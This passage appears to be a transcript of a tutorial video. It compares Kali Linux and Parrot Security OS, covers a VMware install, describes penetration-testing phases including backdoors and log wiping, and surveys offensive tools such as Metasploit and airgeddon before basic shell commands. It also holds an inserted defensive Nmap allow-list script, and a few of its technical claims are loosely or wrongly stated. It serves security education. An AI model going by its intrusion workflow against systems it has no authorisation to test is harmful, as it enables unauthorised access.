Let’s go through the agenda for this video. We will learn about Kali Linux and Parrot Security OS from scratch, while understanding their primary selling points as Linux distributions catered towards penetration testers. Next we get to know some features of these operating systems that stand out of their package. Finally, we directly compare Kali Linux and Parrot Security OS, thereby making a clear-cut conclusion on which OS is perfect on a per-requirement basis.

So let’s start by learning about Kali Linux from a ground level. Kali Linux, which was formerly known as BackTrack Linux, is an open-source Linux distribution aimed at advanced
penetration testing and security auditing. It contains several hundred tools targeted towards various information security tasks such as penetration testing, security research, computer forensics and reverse engineering. Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux takes its roots from the Debian operating system. Debian has been a highly dependable and stable distribution for many years, providing a similarly strong foundation to the Kali Linux desktop. While the operating system can practically modify every single part of our installation, the networking components of Kali Linux come disabled by default. This is done to prevent any external factors from affecting the installation procedure, which may pose a risk in critical environments. Apart from boosting security, it allows a more profound element of security control to the most enthusiastic of users.

Now let’s take a look at the Parrot Security operating system. Parrot Security OS is a Debian-based Linux distribution with an emphasis on security, privacy and development. It is built on Debian’s testing branch and uses a custom hardened Linux kernel. Parrot Security contains several hundred tools targeted towards tasks such as penetration testing, computer forensics, reverse engineering and security research. It is seen as a generally lightweight distribution that can work under rigorous hardware and software specifications. It features a distinct forensics mode that does not mount any of the system’s hard disks or partitions and has no influence on the host system, making it much more stealthy than its regular occurrence. This mode is used on the host system to execute forensic procedures. A rolling release is a paradigm in which software upgrades are rolled out constantly rather than in batches of versions; in software development this ensures that the software is constantly up to date. A rolling release
distribution such as Parrot Security OS follows the same concept: it provides the most recent Linux kernel and software versions as soon as they become available.

With a basic introduction to the operating systems out of the way, let us take a look at the unique features of both Kali Linux and Parrot Security OS. The latest version of Kali Linux comes with more than 600 penetration tools pre-installed. After reviewing every tool included in BackTrack, developers have eliminated a significant number of tools that either simply did not work or duplicated other tools that provided the same or similar functionality. The Kali Linux team comprises a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols. Restricting access of critical code bases to external assets dramatically reduces the risk of source contamination, which could cause Kali Linux users worldwide a great deal of damage as direct victims of cyber crime. Although penetration tools tend to be written in English, the developers have ensured that Kali includes proper multilingual support, allowing more users to operate in their native language and locate the tools they need for the job. The more comfortable a user feels with the intricacies of the operating system, the easier it is to maintain a stronghold over the configuration and the device in general. Since ARM-based single-board systems like the Raspberry Pi are becoming more prevalent and inexpensive, the development team knew that Kali’s ARM support would need to be as robust as they could manage, with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution, so the tools for ARM are updated in conjunction with the rest of the distribution.

Let’s take a look at some of the features of the Parrot Security operating system now. Along with a giant catalog of scripts, Parrot Security OS
has its own hardened Linux kernel, modified explicitly to provide as much security and resistance to hackers as possible in the first line of defense; the configurations in the operating system act as the second gateway, taking care of malicious requests and dropping them off. This is particularly beneficial since, should there be a scenario where the latest Linux kernel is causing some particular issue, the Parrot OS development team will most likely iron it out first before passing it on as an update. As if the custom hardened kernel wasn’t enough, Parrot Security developers managed to install more hacking tools and scripts to ensure a smooth transition for Kali Linux users. All the tools you find in Kali are present in Parrot OS, and a few extra ones for good measure, and this has been achieved while keeping roughly the same operating system size between both of them. However, it’s not all productivity points for Parrot OS. They provide a choice between two different desktop environments: MATE, which comes pre-installed by default, and KDE. For those unfamiliar with Linux terminology, you can think of desktop environments as the main UI for a distribution. Being highly modular in nature, one can use Parrot Security OS while adding another desktop environment that they find appealing. While Kali Linux has only a single option, Parrot Security has provided two optimized builds, with MATE desktop and KDE desktop. One of the primary advantages of Parrot OS over Kali Linux is that it’s relatively lightweight. This implies that it takes significantly less disk space and computing power to function correctly, with as little as 320 MB of RAM required. In reality, Parrot OS is designed to operate successfully off a USB stick, but Kali Linux does not work well from a USB drive and is generally installed in a virtual machine. Parrot OS is more of a niche distribution if you’re searching for something lighter than Kali Linux. Features are great, but what about performance and real world metrics? Let us compare
both these operating systems directly with respect to their hardware specifications and usability. In the end we can decide on what distribution is fit for each type of user.

For our first point of comparison, let’s take a look at the RAM required for optimum performance of the operating system, which is highly essential when trying to crack hashes or something of a similar nature; RAM usage is a very important facet. While Kali Linux demands at least 1 GB of RAM, Parrot Security can operate optimally with a minimum of 320 MB of RAM. For correctly displaying graphical elements, Kali Linux requires GPU-based acceleration, while this is not the case with Parrot Security OS, which doesn’t require any graphical acceleration from the user side. Once these operating systems are installed on VMware using the live boot ISOs, they take up a minimum amount of hard disk storage. Both of these operating systems have a recommended disk storage of a minimum of 20 GB in Kali Linux and a minimum of 15 GB in Parrot Security, so they can install all the tools necessary in the ISO file. When it comes to the category and the selection of tools, Kali Linux has always been the first in securing every single tool available for hackers in the penetration testing industry. Parrot Security, on the other hand, has managed to take it up a notch while specializing in wireless pen testing. Parrot Security makes it a point that all the tools that Kali Linux provides have been included in the ISO, while simultaneously adding some extra tools that many users would have to install from third party sources in Kali Linux. Being a decade-old penetration testing distribution, Kali Linux has formed a very big community with strong support. Parrot Security, on the other hand, is still growing, and it is garnering much more interest among veteran penetration testers and ethical hackers. A primary drawback of Kali Linux is the extensive hardware requirement to perform optimally: it requires higher memory than Parrot Security. It also
needs graphical acceleration while demanding more virtual hard disk storage. Parrot Security, on the other hand, was initially designed to run off a USB drive directly, thereby requiring very minimal requirements from a hardware perspective, like just 320 MB of RAM and no graphical acceleration needed. This means Parrot Security is much more feasible for people who are not able to devote massive resources to either their virtual machine or their laptop hard disk directly.

With the comparison done between both of these operating systems, let’s take a look at the type of users both of these are catered to. One can go with Kali Linux if they want the extensive community support offered by its users, if they want to go with a trusted development team that has been working on this distribution for many years, if they have a powerful system which can run Kali Linux optimally without having to bottleneck performance, and if they are comfortable with a semi-professional environment which may or may not be very useful for new beginners. One can decide to go with Parrot Security if they want to go with a very lightweight and lean distribution that can run pretty much on all systems. It also has a lot of tools pre-installed, and some of them are not even present on Kali Linux. It is much more suitable for underpowered rigs where users do not have a lot of hardware resources to provide to the operating system, and thereby it is much more feasible for people with underpowered laptops or no graphical acceleration. Compared to Kali Linux, Parrot’s desktop environment is also relatively easier to use for new beginners. For people who are just getting into ethical hacking, Parrot Security does a relatively better job of introducing them to the operating system and to the various tools without having to dump them into the entire intricacies.

The installation of Kali Linux: there are multiple ways to install Kali Linux. We can either install it on a normal hard drive, in virtual machine software such as
VMware or VirtualBox, or we can do that on bare metal machines. Now, for the convenience of explanation, we’re going to install Kali Linux today on virtual machine software known as VMware. VMware is able to run multiple operating systems on a single host machine, which in our case is a Windows 10 system. To get started with the Kali Linux installation, we have to go to the website to download an image file. We go to Get Kali, and as you can see there are multiple platforms on which this operating system can be installed. As per our requirement, we’re going to go with the virtual machine section; as you can see, it is already recommended by the developers. This is the download button, which will download a 64-bit ISO file. We can download 32-bit, but that is more necessary for bare metal machines or if you’re going to use it for older devices which do not support 64-bit operating systems yet. After clicking on the download button we can see we have an archive which will have the ISO files. For now, we have downloaded the ISO file and it is already present with me, so we can start working on the VMware side of things.

Once the ISO file is downloaded, we open up VMware Workstation, go to File and we create a new virtual machine. In these two options it is highly recommended to go with the typical setup rather than the custom one. The custom one is much more advanced and requires much more information from the user, which is beneficial for developers and people who are well-versed with virtualization software, but for 90% of the cases the typical setup will be enough. Here we can select the third option, which will be "I will install the operating system later". In some operating systems we can use the ISO file here directly and VMware will install it for us, but right now, in the case of Kali Linux, the third option is always the safest. Kali Linux is a Linux distribution, so we can select Linux over here, and for the version, as you can see, we have multiple versions here, such as the multiple kernels. Every
distribution has a parent distribution; for example, Kali Linux has Debian, and there are other distributions which are based on or forked from some parent distribution. Kali Linux is based off of Debian, so we can go with the highest version of Debian, which is Debian 10.x 64-bit. Go next. We can write any such name; we can write Kali Linux so that it’ll be easier to recognize the virtual machine among this list of virtual machine instances. The location can be any location you decide to put it in. By default it should be the Documents folder, but wherever you put it will hold all the information regarding the operating system: all the files you download, all the configurations you store, everything will be stored in this particular location that you provide.

When we go next, we are asked about the disk capacity. This disk capacity will be all the storage that will be provided to your virtual machine of Kali Linux. Think of your Windows device: if you have a 1 TB hard drive, you have the entirety of the hard disk to store data on. However much data you give here, you can only store up to that amount of data, not to mention some amount of capacity will be taken up by the operating system itself to store its programs and applications. For now we can give around, let’s say, 15 GB, or since the recommended size for Debian is 20, we can just go ahead with 20. It all depends on the user case. If you are going to use it extensively, you can even go as high as 50 or 60 GB if you have plans to download many more applications and perform multiple different tests. Another option we get over here is storing the virtual disk as a single file or storing it in multiple files. As we already know, this virtual machine runs entirely on VMware. Sometimes, when transferring these virtual machine instances, let’s say from a personal computer to a work computer, we’re going to need to copy the entire folder that we had mentioned before over here. Instead, all virtual machines have a portability feature. Now, this portability
feature is possible for all scenarios, except it is much easier if we split the virtual disk into multiple files. Now, even if this makes porting virtual machines easier, from either system to system or software to software, let’s say if you want to switch from VMware to VirtualBox or vice versa, the performance takes a small hit. It’s not huge, but it’s recommended to go with storing the virtual disk as a single file if you have no purpose of ever moving the virtual machine. Even if you do, it’s not a complete stop that it cannot be ported; it’s just easier when using multiple files. But in order to get the best performance out of the virtual machine, we can store it as a single file over here. This is a summary of all the changes that we made and all the configurations that have been settled until now. Now, at this point of time we have not provided the ISO file yet, which is the installation file for Kali Linux that we downloaded from the website. As of right now we have only configured the settings of the virtual machine, so we can press on Finish, and we have Kali Linux in the list.

Now, to make further changes we press on Edit virtual machine settings. The memory is supposed to give the RAM of the virtual machine. For devices with RAM of 8 GB or below, giving a high amount of RAM will cause performance issues on the host system. If the memory has some amount of free space left, let’s say on idle my Windows machine takes about 2 GB, so I have 6 GB of memory to provide, although if you provide all of the 6 GB it will be much more difficult for the host system to run everything properly. So for this instance we can keep it as 2 GB of memory for the virtual machine instance. Similarly, we can use the number of processors, and we can customize it according to our liking; let’s say if we want to use one processor but we want to use two different cores, we can select them as well. The hard disk is preset as the SCSI hard disk and it does not need to be changed for the
installation of this operating system at all. CD/DVD: this is where the installation file comes in. You can think of the ISO file that we downloaded as a pen drive or a USB thumb drive which is necessary to install an operating system. To provide this, we’re going to select "Use ISO image file", we’re going to click on Browse, go to Downloads and select the ISO file over here, select Open, and you can see it is already loaded up. Next, in the network adapter it is recommended to use NAT. This helps the virtual machine to draw the internet from the host machine settings: if your host machine is connected to the internet, then the virtual machine is connected as well. There are some other options, such as host-only or custom segments or LAN segments, but those are not necessary for installation. The rest of them are pretty standard, do not need any extra configuration and can be left as they are. Press OK, and now we can power on this virtual machine.

In this screen we can choose how we want to proceed with the installation. We have a Start installer option over here, so we’re going to press Enter on that. We’re going to wait for the things to load from the ISO file. The first step in the installation is choosing the language of the operating system; for this we can go with English as standard. This is the location. This will be used for setting up the time and some of the internal settings which depend entirely on the location of the user, so for this we’re going to go with India. Configuring the keyboard: it’s always recommended to go with American English first. Many people make the mistake of going with the Indian keyboard if it is possible, and it causes a lot of issues later on, so it’s always preferred to go with American English, and if later we see some necessity for another keyboard layout that is required, we can install it later. But for now we should always stick with American English as a basic. At this point it’s going to load the installation components from the ISO file. It
is a big file of 3.6 GB, so it has a lot of components that need to be put into the virtual machine, which can also be used to detect hardware. Once the hardware and the network configuration is done by the ISO file, we want to write a host name for the system. This host name can be anything which is used to recognize this device on a local network or a LAN cable; let’s say we use the name Kali. Domain name: we can skip it for now, it’s not necessary as such for the installation. This is the full name for the user; let’s say we can provide the name Simplilearn as the full name. Next we’re going to set up a username. This username is going to be necessary to identify the user from the root account and the subsequent accounts below it. For now we can give it as something like simply123. Now we have to choose a password for the user. Now remember, since this is the first user that is being added onto this newly installed operating system, it needs to be a password for the administrator. We can use whichever password we like over here, use the same password below and press on Continue.

At this point it’s going to detect the components on which the operating system can be installed. Here there are multiple options, like "use entire disk", "use entire disk and set up LVM", and "use entire disk and set up encrypted LVM". For newcomers it is recommended to just use the first one, since LVM encryption is something that you can learn afterwards when you’re much more hands-on with the Linux operating system. For now we’re going to use the "use entire disk" guided installation and press on Continue. When we set up the virtual machine on VMware, we had set up a disk capacity; there we gave the proposed 20 GB. That is the hard disk which is being discovered here; even though it is a virtual disk on VMware, it acts as a normal hard disk on which an operating system can be installed. So we select this one and press on Continue. Here there is a multiple partition system. All the operating systems that are
installed have different components: one is used for keeping the applications, one for the files, another for the RAM management, and other things. For newcomers it is always recommended to keep it in one partition, and we’re going to select that and press on Continue. This is just an overview of the partitions it’s going to make. As you can see, it has a primary partition of 20.4 GB and a logical partition of 1 GB used for swap memory. Now, these kinds of names can be confusing for people who are not well versed with Linux operating systems or virtualization in general, but for now you can go ahead and press on Continue, as this will be fine. We can press on "Finish partitioning and write changes to disk" and Continue. It’s just a confirmation page; as you can see, SCSI3 is our virtual hard disk of 20 GB disk capacity. Write the changes to the disk: we press Yes and click on Continue.

At this point the installation has started. Now, this installation will take a while depending on the amount of RAM provided, the processors provided, and how much the performance of the system is being hampered by the host machine. On quicker systems this will be rather quick, while on the smaller ones this will take a while. Since this is going to take some time to install, as it is being run on a virtual machine with only 2 GB of RAM, we’re going to speed up this part of the video so we don’t have to waste any more time just watching the progress bar.

Now that our core installation is completed, it’s asking us to configure a package manager. The work of a package manager on a Linux operating system is similar to the Google Play Store on Android mobile devices and the App Store for Apple devices. It’s an interface to install external applications which are not installed by default, let’s say Google Chrome or any other browser which can be used to browse the internet. At this point of time it asks us to select a network mirror; we’re going to select Yes and move forward with this. Next it’s
going to ask us for an HTTP proxy, which we can leave blank and press Continue to move forward. At this point of time it’s looking for updates to the Kali Linux installation. This will fetch the new builds from the Kali server so the installation is always updated to the latest version. Now that the package manager is configured, we have the GRUB bootloader. GRUB is used for selecting the operating system while booting up; its core functionality is to allow the operating system to be loaded correctly without any faults. So at this point of time, if it asks "Install the GRUB boot loader to your primary drive?", we can select Yes and press Continue. Remember, the installation was conducted on /dev/sda, so we’re going to select installation of the GRUB loader on the same hard disk that we have configured; we press this one and press Continue. So now the GRUB bootloader is being installed. GRUB is highly essential because it shows the motherboard where to start the operating system from. Even if the operating system is installed correctly and all the files are in the correct order, the absence of a bootloader will mean the OS cannot be launched properly. As you can see, the installation is finally complete, so now we can press on Continue and it’s going to finalize the changes.

Now you can see Kali Linux being booted up straight away. It doesn’t check for the ISO file anymore, since the operating system is now installed onto the virtual hard disk storage that we had configured before. Here we’re going to enter our username and password that we had set up before, and we have the Kali Linux system booted up. This is your home page. We can see the installed applications over here, which are used for penetration testing by multiple security analysts worldwide. All of these come pre-installed with Kali Linux, and others can be installed using the APT package manager that we had configured. We can see our full name over here, and with this our installation of Kali Linux is complete. It’s no
secret that the vast bulk of our internet usage is vulnerable to hacking, whether it's through hazardous messaging apps or faulty operating systems. Penetration testing has become the norm for vulnerability assessment in order to fill this vacuum in digital security. Kali Linux is a well-known operating system in this fight against hackers. Kali Linux, a distribution designed specifically for penetration testers, has layers of features that we will go over in today's lesson, and we will take a look at some of the tools and features that the operating system has to offer.

Let's take a look at the video's topics. We start by learning the requirements of an operating system like Kali Linux. We learn more about the core features of the OS and its intricacies. Moving on, we take a look at the five distinct stages of penetration testing that dictate the flow of vulnerability assessment in general. Next we learn about some important tools that can be found on Kali Linux which are geared specifically for ethical hacking purposes. And finally we have an extensive demonstration where we work on some basic terminal commands, proxy tools, and a couple of highly regarded pieces of software from the crux of the operating system.

Let's start by learning why one should learn Kali Linux in the first place. In today's world, an organization's most valuable asset is its information or data. This is true for all kinds of businesses, be they public or private; on a daily basis they all deal with enormous amounts of sensitive information. As a consequence, terrorist groups, hacking teams, and cyber thieves often attack them. To ensure safety and protection, businesses use a variety of security measures and regularly update their index. Organizations must be proactive in this age of digitalization by regularly assessing and updating their security. Every day, hackers discover new methods to breach firewalls. Ethical hackers, or white hat hackers, provide a fresh perspective on security. They conduct penetration tests to validate security measures; generally they will penetrate your networks and give you relevant information about your security posture. Once an organization has this knowledge, it may upgrade its security procedures accordingly.

The latest version of Kali Linux comes with more than 600 penetration tools pre-installed. After reviewing every tool that was included in BackTrack, the developers eliminated a great number of tools that either simply did not work or duplicated other tools that provided the same or similar functionality. Occasionally, when conducting penetration testing or hacking, we must automate our activities, since there may be hundreds of conditions and payloads to test and manually examining everything is time-consuming. To improve our productivity we utilize tools that come prepackaged with Kali Linux; these tools not only save us time but also accurately capture and process the data.

The Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols. Restricting access of critical code bases to external assets greatly reduces the risk of source contamination. Although penetration tools tend to be written in English, the developers have ensured that Kali includes true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job. Since ARM-based single-board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive, the development team knew that Kali's ARM support would need to be as robust as they could manage, with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution, so tools for ARM are updated in conjunction with the rest of the distribution's tools.

Now that we understand
the necessity for an operating system like Kali Linux, let us take a look at some of its core features and offerings to the ethical hacking world. Kali Linux, formerly known as BackTrack Linux, is an open-source Linux distribution aimed at advanced penetration testing and security auditing. It contains several hundred tools targeted towards various information security tasks such as penetration testing, security research, computer forensics, and reverse engineering. Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux takes its roots from the Debian operating system. Debian has been a highly dependable and stable distribution for many years, providing a similarly strong foundation to the Kali Linux desktop. While the operating system is capable of practically modifying every single part of our installation, the networking components of Kali Linux come disabled by default. This is done to prevent any external factors from affecting the installation procedure, which may pose a risk in critical environments. Apart from boosting security, it allows a deeper element of security and control to the most enthusiastic of users.

Let us now take a look at the five stages, or phases, of penetration testing. The first stage of the penetration test is known as the reconnaissance phase. In this stage the security researcher collects information about the target. It can be done actively or passively, which means you are collecting information without contacting the target, or even both. It helps security firms gather information about the target system: network components, active machines, open ports and access points, operating system details, etc. This activity can be performed by using information available in the public domain and using different tools. The next phase is more tool-oriented rather than performed manually, and it is the scanning phase. The penetration tester runs one or more scanner tools to gather more information about the target. By using various scanners such as war dialers, port scanners, network mappers, and vulnerability scanners, the tester collects as many vulnerabilities as possible, which help to turn an attack into a more sophisticated one. The next stage is known as the gaining access phase. In this phase the penetration tester tries to establish a connection with the target and exploit the vulnerabilities found in the previous stage. Exploitation may be buffer overflow attacks, denial of service or DoS attacks, session hijacking, and many more. Basically, the penetration tester extracts information and sensitive data from servers by gaining access using different tools. In the maintaining access phase, the penetration tester tries to create a backdoor for himself; it helps him identify hidden vulnerabilities in the system and can later act as a gateway to retrieve control of the system. In the final phase of covering tracks, the penetration tester tries to remove all logs and footprints which would help the administrator identify his presence. This helps the tester think like a hacker and perform corrective actions to mitigate those activities.

Now that we understand the basics of penetration testing and how ethical hackers go about their way, let us take a look at some notable tools which can be used on Kali Linux. At the top of the chain lies Nmap. Nmap is a free and open-source port scanner utility which can be used for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. It is most beneficial in the early stages of ethical hacking, when a hacker must figure out the possible entry point to a system before running the necessary exploits, thus allowing the hacker to leverage any insecure openings and breach the device.
It's a part of the scanning phase of penetration testing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services these hosts are offering, what operating systems they are running and their versions, what type of packet filters and firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts as well. Since every application that connects to a network needs to do so via a port, the wrong port or server configuration can open a can of worms which leads to a thorough breach of the system and ultimately a fully hacked device.

Next on the list we have Metasploit. The Metasploit framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systemic vulnerabilities on networks and servers, as a part of the third stage of penetration testing. It's an open-source framework which can be easily customized and used with most operating systems. With Metasploit, the ethical hacking team can use ready-made or custom code and introduce it into a network to probe for weak spots, as another flavor of threat hunting. Once these flaws are identified and documented, the information can be used to address systemic weaknesses and prioritize solutions. Once a particular vulnerability is identified and the exploit is fed into the system, there are a host of options for the hacker. Depending on the vulnerability, hackers can even run root commands from the terminal, allowing complete control over the activities of the compromised system as well as all personal data stored on the device. A big advantage of Metasploit is the ability to run full-fledged scans on a target system, thereby giving a detailed picture of the security index of said system. This also provides the necessary exploits that can be used to bypass the firewalls and the antivirus software. Having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers, as denoted by its high rank in this list.

At number three we have Wireshark. Wireshark is the world's foremost and most widely used network protocol analyzer. It lets you see what's happening on your network at a microscopic level and is a de facto standard across many commercial and nonprofit enterprises, government agencies, and educational institutions. Wireshark is a popular open-source tool to capture network packets and convert them to human-readable binary format. It provides every single detail of the organization's network infrastructure; it consists of devices designed to help measure the ins and outs of the network. The information collected through Wireshark can be used for various purposes, such as real-time or offline network analysis, identification of the traffic coming onto your network, its frequency, and its latency between specific hops. This helps network administrators generate statistics based on real-time data. Wireshark is also a cross-platform tool that can be installed on Windows, Linux, and Mac systems, enabling hackers on all ecosystems to monitor network traffic irrespective of the operating system. The development team is determined to maintain this level of freedom for their users in the foreseeable future.

The next tool on our list is airgeddon, which is a part of the third phase of penetration testing. This is a multi-use bash script for Linux systems to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts, along with being able to launch denial of service attacks on compromised networks. This multi-purpose Wi-Fi hacking tool has very rich features which support multiple methods for Wi-Fi hacking, including multiple WPS hacking modes, all-in-one WEP attack, handshake file capturing, evil twin attacks, Pixie Dust, and so much more. It usually needs an external network adapter that supports monitor mode, which is necessary to be able to capture wireless traffic traversing the air channels.
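The network-inventory use of Nmap mentioned above can be scripted against Nmap's grepable output format (-oG), so an administrator can compare which services a host actually exposes with what is expected. This is an added example, not code from the video; the report text is constructed (it imitates the tab-separated -oG layout) and the allow-list is an assumption.

```shell
#!/bin/sh
# Added example (not from the video): check a saved Nmap grepable report
# ("nmap -oG report.gnmap ...") against an allow-list of expected ports,
# the network-inventory use of Nmap described in the tools overview.
# SAMPLE_REPORT is constructed for this example; it imitates the -oG layout
# (tab-separated fields) with a Windows host exposing MSRPC, HTTPS and RDP.

SAMPLE_REPORT=$(printf '%b\n' \
    '# Nmap scan initiated (constructed sample)' \
    'Host: 192.168.29.179 ()\tStatus: Up' \
    'Host: 192.168.29.179 ()\tPorts: 135/open/tcp//msrpc///, 443/open/tcp//https///, 3389/open/tcp//ms-wbt-server///\tOS: Microsoft Windows XP SP3' \
    '# Nmap done (constructed sample)')

# Read a -oG report on stdin and print one "<host> <port>/<proto> <service>"
# line per open port. Each Ports: entry has the form
# port/state/proto/owner/service/rpc/version.
open_ports() {
    awk -F'\t' '
        /^Host:/ {
            host = $1
            sub(/^Host: /, "", host)
            sub(/ .*/, "", host)
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports:/) continue
                list = $i
                sub(/^Ports: /, "", list)
                n = split(list, entry, /, */)
                for (j = 1; j <= n; j++) {
                    split(entry[j], f, "/")
                    if (f[2] == "open") print host, f[1] "/" f[3], f[5]
                }
            }
        }'
}

# Read open_ports output on stdin and compare it with a space-separated
# allow-list of "port/proto" values. Prints every port that is not in the
# list and returns 1 if any was found, so a periodic job can alert when a
# host starts exposing something new.
unexpected_ports() {
    allow=" $1 "
    status=0
    while read -r host portproto service; do
        case "$allow" in
            *" $portproto "*) ;;
            *)
                echo "$host $portproto ($service) is not in the allow-list"
                status=1
                ;;
        esac
    done
    return "$status"
}

# Usage: only MSRPC and HTTPS are expected, so RDP on 3389 is reported.
if printf '%s\n' "$SAMPLE_REPORT" | open_ports | unexpected_ports "135/tcp 443/tcp"; then
    echo "all open ports are in the allow-list"
fi
```

Against a real report of a host you administer, feed the file to `open_ports` on stdin instead of the constructed sample.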
Thanks to its open-source nature, airgeddon can be used with multiple community plugins and add-ons, thereby increasing its effectiveness against a wide variety of routers in both the 2.4 GHz band and the 5 GHz band.

The next tool is John the Ripper. John the Ripper is an open-source password security auditing and password recovery tool available for many operating systems. John the Ripper Jumbo supports hundreds of hash and cipher types, including those for user passwords of operating systems, web apps, groupware, database servers, network traffic captures, encrypted private keys, file systems, and document files. Some of the key features of the tool include offering multiple modes to speed up password cracking, automatically detecting the hashing algorithm used by the passwords, and the ease of running and configuring the tool, making it a password cracking script of choice for novices and professionals alike. It can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources. The word list used in these dictionary attacks can be supplied from the user's end, allowing for a completely customizable process.

Now that we have covered the basics of Kali Linux, let us take a look at the agenda for our demo today. We start out with a few terminal commands that are a basic part of a Linux operating system, then configure our own proxy chains to maintain anonymity while running penetration testing attacks on our victims. Next we run a few Nmap scans on a local Windows 10 machine to find out the type of information that can be gathered in such a scenario. Moving on, we use Wireshark to monitor internet traffic and understand the importance of encryption and security when browsing the World Wide Web. Next we learn about Metasploit and its various applications in the line of vulnerability assessment of a device, and finally we use Metasploit to take root access of a fully updated Windows 10 computer system. Let's begin
with some terminal basics on Kali Linux. When most people hear the term Linux, they envision a complex operating system used only by programmers; however, the experience is not as frightening as it appears. Linux is an umbrella term for a collection of free and open-source Unix operating systems. There are many variants like Ubuntu, Fedora, and Debian; these are distributions, which is a more precise term. When using a Linux operating system you will most likely utilize a shell, which is a command line interface that provides access to the operating system's services. The majority of Linux distributions ship with a graphical user interface, also known as a GUI, as their primary shell; this is done to facilitate user interaction in the first place. Having said that, a command line interface is suggested due to its increased power and effectiveness: by entering commands into the CLI, tasks that require a multi-step GUI procedure may be completed in a matter of seconds.

We can start the terminal by clicking on the prompt icon here on top. Once the terminal is opened we can type our commands. The first command that we are going to look into is pwd. pwd stands for present working directory. As of right now, what you're seeing is the terminal window. By default, if I write pwd and press Enter, this shows the directory in which the terminal is being run. As of right now it's in the NF folder of my desktop, which is specifically this folder; if I open up this folder you can see it is currently empty, as in it has no contents. If I use another command known as mkdir, which stands for make directory, and write mkdir NF2 (short for new folder 2), then if I open up NF you can see the new folder is created. This is how the pwd command works.

Another important command, to change directories, is called the cd command. Let's say right now I am in NF and I want to create a new file in the NF2 folder, or something else in the NF2 folder; I have to shift to it with cd NF2. Now if I write pwd it'll show the present working directory of /home/simplilearn/Desktop/NF, and inside that I am in NF2 right now. cd is used to navigate the Linux files and directories; it requires either the full path or just the name of the directory. If we have to move to a completely different folder or a completely different file, then we can use the entire path like this; for now cd works. Another few commands: we can write cd .. and it'll come back one folder; now the pwd will be just NF and not NF2. Let's say we are in this folder and we want to go to a different folder; let's say we just go for cd /home/simplilearn. That's it: right now these are the folders in our current present working directory. We have the Desktop, the Documents, Downloads, etc. From here we can again go to the Desktop using the same cd command, cross-check the changing of directories, and check the files again, and yes, there we go: NF.

How do we know this? The command used to show the files and folders in a folder is known as the ls command. ls can be used to view the contents of a directory. By default this command will display the contents of your current working directory; if we add some other parameters we can find the contents of other directories as well. There are some hidden files as well in Linux which cannot be shown just with ls. For example, if you just go to cd /etc, which is a configuration folder for Linux, and write ls, these are the files that can be seen. If you want to see the hidden files we'll have to add one more parameter here, like ls -a, and as you can see the number of files has increased this time around. There are other things as well that we can see: ls -al will show the hidden files along with some of the parameters and some of the permissions that have been provided for each file. As you can see, many of these files have root access; some of them can write, some of them can read; it differs file to file, and the ls -al command is used to check each of these files' permissions and change them accordingly if needed.

The next command that we can look at is the cat command, or concatenate. It is one of the most frequently used commands, and it is used to list the contents of a file on the output. For example, let's say I have a file on the desktop in this NF2 folder. I will create a document, create an empty file, efile; I'll open up the document and write "hello kali" in it, and save it. Now, to change directories from /etc to NF2, we have already discussed how to use the cd command using just the folder name; if you want to go through the entire directory we can write cd /home. As you can see, it is already prompting us to complete the name of the directory; at this point we just have to press Tab and it completes it for us. Next, we already know we have to enter Desktop, NF, and NF2, and this brings us to the current working directory. Here, if we press ls, we can find a file. Now, as discussed, cat, which stands for concatenate, is used to show the contents of a file, so right now if we run cat efile, as you can see we have written "hello kali" in the text file and we can see the output. We can also use it to create new files: for example, if we write cat > efile2 (any file name), here we can write anything, "hello kali again"; once we press Ctrl+C here, we can check efile2 and we have "hello kali again" printed over here. We can see the same using the concatenate command as well: if I press ls you can see we have two files here, and I can go with cat efile2 and I have "hello kali again". This is how the concatenate command works.

Apart from this, there is a different command called cp which is used to copy files from one place to another. Mind you, this is not moving; this is only going to copy. For example, currently our pwd, which is the present working directory, is in the NF2 folder, as you can see over here. Let's copy efile2 to the NF folder: we can write cp efile2 and give the path of the NF folder, which will be /home/simplilearn/Desktop/NF. Now if I press ls I'll still find both files in NF2, since I copied. To go back to the NF folder again, we can again use cd /home/simplilearn/Desktop/NF, no NF2 this time, just NF; as you can see this will change back our present working directory. Now when we press ls we will find the efile2 file and the NF2 folder, and we can confirm this using the GUI as well: this is the NF folder, and you can see the NF2 folder and the efile2 document. If I write cat efile2 we can see the contents of the file.

Now this can be done using moving as well. For example, if I go to cd NF2, which is the inside folder, it has both the document files, efile and efile2. Let's say I want to move efile completely from NF2 to NF. Instead of writing cp, the command I'm going to use is mv: mv efile, and again give the path of the folder into which I have to move it, which will again be /home/simplilearn/Desktop/NF. As you can see, the contents of NF2 have appeared here and efile has been moved from NF2 to NF; this is NF2 and we don't find efile here anymore. If we press cd .. and go back to NF, and ls right now, we can find both the files: efile that we moved and efile2 that we copied from the NF2 folder. So this is how copying and moving work using the terminal. Now, this is just a simple one-line statement that might take a couple of clicks when using a GUI; this is why the command line interface is considered to be much more streamlined for Linux operating systems.

Another very important command for Linux operating systems is the sudo command. sudo is short for superuser do. The command enables you to perform tasks that require administrative or root permissions; we can think of it as how we run programs as administrator on Windows systems. It is not advisable to use this command for daily use, because it might be easy for an error
